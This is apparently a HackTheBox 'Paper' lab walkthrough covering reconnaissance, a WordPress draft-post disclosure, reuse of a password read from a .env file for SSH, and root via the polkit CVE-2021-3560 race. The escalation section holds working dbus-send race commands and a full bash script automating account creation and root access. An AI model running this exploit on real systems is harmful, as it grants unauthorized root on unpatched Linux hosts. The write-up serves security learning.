Paper Walkthrough — HackTheBox
Hey, my friends, I'm Adham Makroum aka 0xmkr24. Today I'll root the Paper box, which retired today. I'll try to keep it simple, and I hope this write-up is useful for you.
Nmap
Nmap scan report for office.paper (10.10.11.143)
Host is up (0.0078s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open  https?
Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Actiontec MI424WR-GEN3I WAP (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (97%), Linux 4.4 (96%), Microsoft Windows XP SP3 (96%), VMware Player virtual NAT device (91%), BlueArc Titan 2100 NAS device (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 3389/tcp)
HOP RTT     ADDRESS
1   0.16 ms 192.168.192.2
2   0.20 ms office.paper (10.10.11.143)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 624.16 seconds
So we have SSH, Apache 2.4.37 on CentOS and an HTTPS port. gobuster found nothing useful, so I moved on to nikto.
Nikto
# nikto -host "http://10.10.11.143/"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.143
+ Target Hostname: 10.10.11.143
+ Target Port: 80
+ Start Time: 2022-02-15 07:05:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/7.2.24
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 2 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-02-15 07:10:04 (GMT-5) (293 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As we can see, the uncommon header x-backend-server points to office.paper, so I added that name to the hosts file and opened it in a browser.
The site runs WordPress 5.2.3, so I ran wpscan.
Wpscan
# wpscan --url "http://office.paper/" -e vp,dbe,vt
but it didn't find any vulnerable plugins or themes.
After exploring the page I found an interesting comment, so I googled it and found a useful result. It describes a flaw in WordPress before 5.2.4 (our 5.2.3 is affected; the fix shipped in 5.2.4 and the issue was assigned CVE-2019-17671):
This vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.
Proof of Concept (replace wordpress.local with the target host):
http://wordpress.local/?static=1
This blog post explains the vulnerability in more detail → Blog
The hidden draft content pointed me to chat.office.paper, so I added it to the hosts file as well.
After reading the messages in the general channel I found a bot that can list files from the server, but the channel was read-only, so I chatted with it in private.
I tried to read user.txt with it first.
After searching through other files I found this
and then I pulled the .env file.
I tried the password from .env over SSH, and it worked,
so I got user.txt.
Privilege Escalation
Time to take full access of this box.
I transferred linpeas and ran it.
Reading the output, I noticed the polkit service it flagged,
so I googled it.
Polkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
It is installed by default on many Linux distributions and is used by systemd, so any Linux distribution that uses systemd also uses polkit.
I searched for how to get root privileges with it and found this blog. The bug is a race in polkit's authentication check (CVE-2021-3560): if the D-Bus caller disappears while polkit is still checking who asked, the request can be treated as authorized, so a privileged AccountsService call like CreateUser goes through without authentication.
If you don't want to follow the exploitation step by step, there is a PoC you can run that gives you a user with root privileges.
As mentioned in the blog, we first measure how long a full (denied) dbus-send call takes:
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required

real 0m0.060s
user 0m0.004s
sys 0m0.002s
Then kill the call after about half of that real time, so polkit is mid-check when the caller vanishes; for me that is 0.030s:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.030s ; kill $!
The timing is not deterministic, so you need to re-run this command several times until the boris user is created; run id boris between attempts to see when it exists.
Next, you need to set a password for the new account.
The D-Bus interface expects a hashed password, which you can create using openssl:
$ openssl passwd -5 password
$5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3
Now you just have to do the same trick again, except this time call the SetPassword D-Bus method:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$5dzEBJ0waB4f606U$vEAZZvZO34Ouw.lszHtkhsT1iyHnZpktRYRiSV/4yB3' string:GoldenEye & sleep 0.030s ; kill $!
Note that you need to put the correct user ID (UID) in the object path, 1005 in my case (id -u boris shows it), keep the same sleep time as before, and paste the hash from the openssl command. This call prints nothing useful on success, so repeat it a few times to be sure it landed.
Then log in as the new user. The int32:1 in CreateUser asked for an administrator account, which on CentOS means boris lands in the wheel group and can sudo:
su - boris
# password: password
sudo su
# password: password
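The whole race above, measure the round trip, kill dbus-send at half that time until the account appears, then set the password, fits in one bash script. This is an added example and not code from the write-up or from the blog it cites; it assumes a box with the vulnerable polkit, GNU sleep (fractional seconds), openssl and dbus-send, reuses the write-up's account name, real name and password, and the "run" argument and the MAX_TRIES cap are this script's own conventions.

```shell
#!/bin/bash
# Added example: automate the dbus-send / kill race from the steps above.
# Assumes a vulnerable polkit, GNU sleep and openssl (as on the box).
# Only does anything when started as: bash polkit-race.sh run

TARGET_USER="boris"
REAL_NAME="Boris Ivanovich Grishenko"
PASSWORD="password"      # password that will be hashed for SetPassword
MAX_TRIES=50             # assumption: give up after this many attempts

# Half of the "real" line printed by bash's time (e.g. "real 0m0.060s"),
# printed as seconds with three decimals; this is the sleep before kill.
half_of_real() {
    printf '%s\n' "$1" | awk '{
        split($2, p, "m"); sub("s", "", p[2])
        printf "%.3f\n", (p[1] * 60 + p[2]) / 2
    }'
}

# Time one full (denied) CreateUser round trip, as the write-up does by hand.
measure_real() {
    { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \
        --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
        string:"$TARGET_USER" string:"$REAL_NAME" int32:1 >/dev/null 2>&1 ; } 2>&1 |
        grep '^real'
}

# Fire a method call in the background and kill it after $1 seconds, so the
# caller is gone while polkit is still deciding whether to authorize it.
race_call() {
    local delay=$1; shift
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \
        --print-reply "$@" >/dev/null 2>&1 &
    sleep "$delay"
    kill $! 2>/dev/null
}

# Repeat CreateUser until the account exists (checked with id) or we give up.
create_user() {
    local delay=$1 i=0
    until id "$TARGET_USER" >/dev/null 2>&1; do
        if [ "$i" -ge "$MAX_TRIES" ]; then
            echo "giving up after $MAX_TRIES tries" >&2
            return 1
        fi
        race_call "$delay" /org/freedesktop/Accounts \
            org.freedesktop.Accounts.CreateUser \
            string:"$TARGET_USER" string:"$REAL_NAME" int32:1
        i=$((i + 1))
    done
    echo "created $TARGET_USER (uid $(id -u "$TARGET_USER")) after $i tries"
}

# SetPassword gives no local sign of success and is harmless to repeat, so
# fire it a fixed number of times instead of polling. The UID in the object
# path is looked up rather than typed in by hand.
set_password() {
    local delay=$1 uid hash i
    uid=$(id -u "$TARGET_USER")
    hash=$(openssl passwd -5 "$PASSWORD")
    for i in $(seq 1 "$MAX_TRIES"); do
        race_call "$delay" "/org/freedesktop/Accounts/User$uid" \
            org.freedesktop.Accounts.User.SetPassword \
            string:"$hash" string:GoldenEye
    done
}

main() {
    local real delay
    real=$(measure_real)
    delay=$(half_of_real "$real")
    echo "round trip: $real -> sleeping $delay s before kill"
    create_user "$delay" || exit 1
    set_password "$delay"
    echo "now: su - $TARGET_USER (password: $PASSWORD), then sudo su"
}

if [ "${1:-}" = "run" ]; then
    main
fi
```

Run it with bash on the box as the low-privileged user (bash polkit-race.sh run); the measured delay is only a starting point, and if CreateUser never lands within MAX_TRIES it is worth nudging the sleep slightly up or down and trying again.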
Finally, the Machine is rooted!